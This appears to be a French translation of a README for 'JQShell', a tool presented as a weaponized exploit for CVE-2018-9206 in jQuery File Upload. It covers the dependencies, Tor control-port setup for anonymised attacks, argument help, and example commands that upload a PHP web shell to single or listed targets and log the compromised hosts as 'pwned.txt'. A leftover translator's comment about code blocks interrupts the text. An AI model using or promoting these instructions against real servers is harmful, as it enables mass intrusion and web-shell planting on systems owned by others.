
Outil d'exploit automatisé pour CVE-2018-9206 (jQuery File Upload) avec balayage mono/multi-cible, support du proxy Tor et journalisation des sorties pour les tests d'intrusion et à des fins éducatives.

JQShell
Une version armée de CVE-2018-9206.
Avertissement
Utiliser cet outil contre des serveurs que vous ne contrôlez pas est illégal dans la plupart des pays. L'auteur décline toute responsabilité quant aux actions de ceux qui utilisent ce logiciel à des fins illégales. Ce logiciel est destiné uniquement à un usage éducatif. Aucun serveur n'a été illégalement compromis lors de la création de ce logiciel.
Fonctionnalités
Cible unique Cibles multiples Tor
Prérequis
Veuillez installer les paquets requis suivants.
Python3
pip3 install requests pysocks subprocess stem
Port de contrôle Tor
Pour utiliser Tor dans ce script, vous devez modifier votre fichier torrc et activer le port de contrôle sur 9051.
En général, ce fichier se trouve ici : /etc/tor/torrc
Ouvrez ce fichier et modifiez cette ligne :
#ControlPort 9051
en
ControlPort 9051
redémarrez le service tor
Utilisation
usage: jqshell.py [-h] [-l LIST_INIT] [-t SINGLE_TARGET] -s SHELL_LOC
[-o OUTPUTZ] [-tor]
optional arguments:
-h, --help show this help message and exit
-l LIST_INIT, --list LIST_INIT
Select for a list of assets to exploit
-t SINGLE_TARGET, --target SINGLE_TARGET
Single exploit target
-s SHELL_LOC, --shell SHELL_LOC
This is required, put the fullpath to your shell
-o OUTPUTZ, --output OUTPUTZ
This is full path to were you want to save your list
of confirmed hosts
-tor, --tor_proxy Select if you have tor installed, you will need to
enable control port
(Note: l'aide en anglais est généralement conservée telle quelle dans un outil, mais la description des arguments est du texte naturel à traduire. Toutefois, il s'agit d'un bloc de code de l'aide affichée par l'outil, donc on ne traduit pas l'intérieur du bloc de code. Le texte en français de la traduction doit se situer en dehors des blocs de code. Ici, le bloc de code contient l'usage et les arguments en anglais, ce qui est normal pour un outil. On ne traduit pas le contenu des blocs de code. Donc on laisse tel quel.)
Exemples
Exécution contre une cible unique.
python3 jqshell.py -t http://localhost/folderwerejqueryis -s /var/www/html/shell.php
Exécution contre une cible unique, avec sauvegarde de la sortie.
python3 jqshell.py -t https://localhost/folderwerejqueryis -s /var/www/html/shell.php -o pwned.txt
Exécution d'une liste, avec sauvegarde de la sortie.
python3 jqshell.py -l /opt/jquery/test.txt -s /var/www/html/shell.php -o pwned.txt
Auteur